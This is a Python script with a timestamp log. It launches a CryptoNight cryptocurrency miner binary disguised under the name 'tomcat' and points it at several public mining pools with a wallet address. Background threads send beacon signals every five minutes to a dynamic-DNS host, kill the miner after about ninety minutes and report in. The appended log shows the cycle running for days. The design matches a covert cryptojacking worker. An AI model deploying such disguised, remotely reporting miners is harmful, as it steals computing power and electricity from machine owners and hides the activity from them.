import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:06:06.414567
#2018-02-17 16:52:04.986080
#2018-02-17 18:40:07.718315
#2018-02-17 20:28:03.961734
#2018-02-17 22:14:05.184071
#2018-02-17 23:58:07.393178
#2018-02-18 01:49:07.087971
#2018-02-18 03:39:05.105924
#2018-02-18 05:28:07.401395
#2018-02-18 07:20:07.373657
#2018-02-18 09:08:04.461535
#2018-02-18 10:54:04.975554
#2018-02-18 12:41:07.982301
#2018-02-18 14:28:04.849810
#2018-02-18 16:18:05.369783
#2018-02-18 18:07:05.066573
#2018-02-18 19:52:05.802675
#2018-02-18 21:38:05.055553
#2018-02-18 23:26:05.298010
#2018-02-19 01:13:05.759367
#2018-02-19 02:59:04.616522
#2018-02-19 04:46:06.282816
#2018-02-19 06:29:04.173071
#2018-02-19 08:19:01.297719
#2018-02-19 10:08:08.345521
#2018-02-19 11:57:02.127866
#2018-02-19 13:43:08.725687
#2018-02-19 15:31:06.184941
#2018-02-19 17:18:01.261473
#2018-02-19 19:06:04.059527
#2018-02-19 20:51:05.581224
#2018-02-19 22:38:01.544132
#2018-02-20 00:23:01.895138
#2018-02-20 02:10:10.065528
#2018-02-20 04:01:08.050157
#2018-02-20 05:44:07.001127
#2018-02-20 07:29:05.829957
#2018-02-20 09:14:07.885495
#2018-02-20 10:56:07.946873
#2018-02-20 12:45:04.004061
#2018-02-20 14:30:01.516555
#2018-02-20 16:14:07.961382
#2018-02-20 18:02:07.602677
#2018-02-20 19:54:08.420444
#2018-02-20 21:41:01.260098
#2018-02-20 23:23:04.404074
#2018-02-21 01:07:07.226573
#2018-02-21 02:54:05.095024
#2018-02-21 04:41:07.215948
#2018-02-21 06:29:05.806986
#2018-02-21 08:14:07.944148
#2018-02-21 10:00:13.572804
#2018-02-21 11:48:02.042261
#2018-02-21 13:38:05.758932
#2018-02-21 15:21:09.148923
#2018-02-21 17:13:01.763135
#2018-02-21 19:00:06.341796
#2018-02-21 20:46:04.019832
#2018-02-21 22:30:08.538437
#2018-02-22 00:20:07.932894
#2018-02-22 02:09:07.329459
#2018-02-22 03:54:07.985146
#2018-02-22 05:40:09.658566
#2018-02-22 07:25:09.056747
#2018-02-22 09:13:07.530962
#2018-02-22 11:02:09.163486
#2018-02-22 12:50:10.761753
#2018-02-22 14:36:06.753064
#2018-02-22 16:21:05.796500
#2018-02-22 18:09:04.712888
#2018-02-22 19:57:04.508926
#2018-02-22 21:46:07.665916
#2018-02-22 23:34:07.736038
#2018-02-23 01:22:05.765665
#2018-02-23 03:08:01.468720
#2018-02-23 04:55:01.537163
#2018-02-23 06:40:07.958296
#2018-02-23 08:28:06.472568
#2018-02-23 10:42:04.056551
#2018-02-23 12:36:06.714297
#2018-02-23 14:22:04.082779
#2018-02-23 16:13:09.650450
#2018-02-23 17:59:08.683809
#2018-02-23 19:45:05.879341
#2018-02-23 21:29:01.956864
#2018-02-23 23:17:07.647730
#2018-02-24 01:08:03.898279
#2018-02-24 02:59:03.505517
#2018-02-24 04:46:07.086090
#2018-02-24 06:32:05.742243
#2018-02-24 08:21:07.413832
#2018-02-24 10:05:05.307678
#2018-02-24 12:02:01.831468
#2018-02-24 13:49:06.032791
#2018-02-24 15:30:01.581940
#2018-02-24 17:21:01.338457
#2018-02-24 19:10:07.734422
#2018-02-24 20:58:01.513271
#2018-02-25 01:11:07.425390
#2018-02-25 04:57:05.863220
#2018-02-25 09:29:01.591906